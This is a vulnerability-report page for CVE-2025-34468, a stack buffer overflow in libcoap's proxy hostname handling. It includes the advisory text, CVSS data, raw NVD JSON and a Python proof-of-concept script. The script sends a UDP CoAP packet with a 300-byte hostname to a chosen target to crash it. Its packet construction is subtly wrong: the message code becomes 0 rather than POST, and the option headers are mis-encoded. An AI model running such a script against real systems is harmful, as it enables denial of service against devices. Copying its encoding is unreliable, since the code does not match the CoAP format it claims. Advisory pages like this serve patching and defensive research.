Security Vulnerability Report
中文
CVE-2025-34468 CVSS 9.8 CRITICAL

CVE-2025-34468

Published: 2025-12-31 19:15:44
Last Modified: 2026-01-14 20:18:33
Source: [email protected]

Description

libcoap versions up to and including 4.3.5, prior to commit 30db3ea, contain a stack-based buffer overflow in address resolution when attacker-controlled hostname data is copied into a fixed 256-byte stack buffer without proper bounds checking. A remote attacker can trigger a crash and potentially achieve remote code execution depending on compiler options and runtime memory protections. Exploitation requires the proxy logic to be enabled (i.e., the proxy request handling code path in an application using libcoap).

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:libcoap:libcoap:*:*:*:*:*:*:*:* - VULNERABLE
libcoap <= 4.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-34468 PoC - libcoap Stack Buffer Overflow in Address Resolution This PoC demonstrates sending a crafted CoAP proxy request with oversized Hostname. Note: This is for educational and authorized testing purposes only. """ import socket import struct def create_coap_packet(): """Create a CoAP packet with oversized Hostname option""" # CoAP Header version = 1 message_type = 1 # CON token_length = 0 code = 0.02 # POST message_id = 0x1234 header = (version << 6) | (message_type << 4) | token_length first_byte = header # Build options options = b'' # Uri-Path option (must be before Proxy-Uri) options += struct.pack('B', 0x0E) # Option Delta = 0, Length = 1 options += struct.pack('B', ord('p')) # Proxy-Uri option with oversized hostname # Option number 35, critical and unsafe option oversized_hostname = 'A' * 300 # Exceeds 256-byte buffer proxy_uri = f'coap://{oversized_hostname}/test' # Option header: delta=3 (Proxy-Uri), length encoded options += struct.pack('B', 0x35) # Delta=3, Length=5 options += struct.pack('B', len(proxy_uri)) options += proxy_uri.encode('utf-8') # Payload marker payload = b'\xff' # Construct packet packet = bytes([first_byte, int(code), (message_id >> 8) & 0xFF, message_id & 0xFF]) packet += options + payload return packet def send_exploit(target_host, target_port=5683): """Send the exploit to target""" packet = create_coap_packet() try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) sock.sendto(packet, (target_host, target_port)) print(f'[+] Exploit packet sent to {target_host}:{target_port}') print(f'[+] Packet size: {len(packet)} bytes') print(f'[+] Oversized hostname length: 300 bytes') # Try to receive response try: data, addr = sock.recvfrom(1024) print(f'[*] Received response from {addr}: {data.hex()}') except socket.timeout: print('[*] No response received (target may have crashed)') except Exception as e: print(f'[-] Error: {e}') finally: sock.close() if __name__ == '__main__': import sys if len(sys.argv) < 2: print('Usage: python3 cve_2025_34468_poc.py <target_ip>') sys.exit(1) target = sys.argv[1] send_exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34468", "sourceIdentifier": "[email protected]", "published": "2025-12-31T19:15:43.923", "lastModified": "2026-01-14T20:18:32.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libcoap versions up to and including 4.3.5, prior to commit 30db3ea, contain a stack-based buffer overflow in address resolution when attacker-controlled hostname data is copied into a fixed 256-byte stack buffer without proper bounds checking. A remote attacker can trigger a crash and potentially achieve remote code execution depending on compiler options and runtime memory protections. Exploitation requires the proxy logic to be enabled (i.e., the proxy request handling code path in an application using libcoap)."}, {"lang": "es", "value": "Las versiones de libcoap hasta la 4.3.5 inclusive, anteriores al commit 30db3ea, contienen un desbordamiento de búfer basado en pila en la resolución de direcciones cuando datos de nombre de host controlados por el atacante se copian en un búfer de pila fijo de 256 bytes sin una comprobación de límites adecuada. Un atacante remoto puede provocar un fallo y potencialmente lograr la ejecución remota de código dependiendo de las opciones del compilador y las protecciones de memoria en tiempo de ejecución. La explotación requiere que la lógica de proxy esté habilitada (es decir, la ruta de código de manejo de solicitudes de proxy en una aplicación que usa libcoap)."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libcoap:libcoap:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.3.5", "matchCriteriaId": "22875932-4B0B-490A-AE0E-751EBC7CD54A"}]}]}], "references": [{"url": "https://github.com/obgm/libcoap/commit/30db3ea", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/obgm/libcoap/pull/1737", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://libcoap.net/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/libcoap-stack-based-buffer-overflow-in-address-resolution-dos-or-potential-rce", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.